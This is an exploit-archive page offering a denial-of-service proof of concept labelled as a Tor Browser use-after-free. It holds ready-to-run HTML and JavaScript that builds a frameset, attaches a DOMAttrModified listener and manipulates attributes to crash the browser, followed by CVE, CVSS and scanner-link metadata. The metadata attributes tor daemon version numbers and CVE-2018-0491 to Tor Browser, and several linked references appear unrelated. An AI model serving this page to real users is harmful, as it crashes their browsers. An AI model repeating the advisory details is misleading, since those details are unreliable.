Tor Browser - Use After Free (PoC)

vendor:

Tor Browser

by:

t4rkd3vilz

7.5

CVSS

HIGH

Use After Free

416

CWE

Product Name: Tor Browser

Affected Version From: Tor 0.3.2.x

Affected Version To: Tor 0.3.2.10

Patch Exists: YES

Related CWE: CVE-2018-0491

CPE: a:torproject:tor_browser

Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-0491/

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=57606, https://www.infosecmatter.com/nessus-plugin-library/?id=45378, https://www.infosecmatter.com/nessus-plugin-library/?id=56480, https://www.infosecmatter.com/nessus-plugin-library/?id=70881, https://www.infosecmatter.com/list-of-metasploit-windows-exploits-detailed-spreadsheet/, https://www.infosecmatter.com/nessus-plugin-library/?id=17158, https://www.infosecmatter.com/nessus-plugin-library/?id=81867

Platforms Tested: Kali Linux

2018

Tor Browser – Use After Free (PoC)

This exploit is a proof of concept for a use after free vulnerability in Tor Browser. The exploit is triggered by creating a frameset element, appending a child element to it, and then adding a DOMAttrModified event listener to the frameset. This causes a use after free vulnerability, which can be used to cause a denial of service.

Mitigation:

Users should upgrade to the latest version of Tor Browser (0.3.2.10) to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Tor Browser - Use After Free (PoC)
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.torproject.org/ 
# Software Link: https://www.torproject.org/download/download-easy.html.en
# Version: Tor 0.3.2.x before 0.3.2.10
# Tested on: Kali Linux
# CVE : CVE-2018-0491

#Run exploit, result DOS


<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>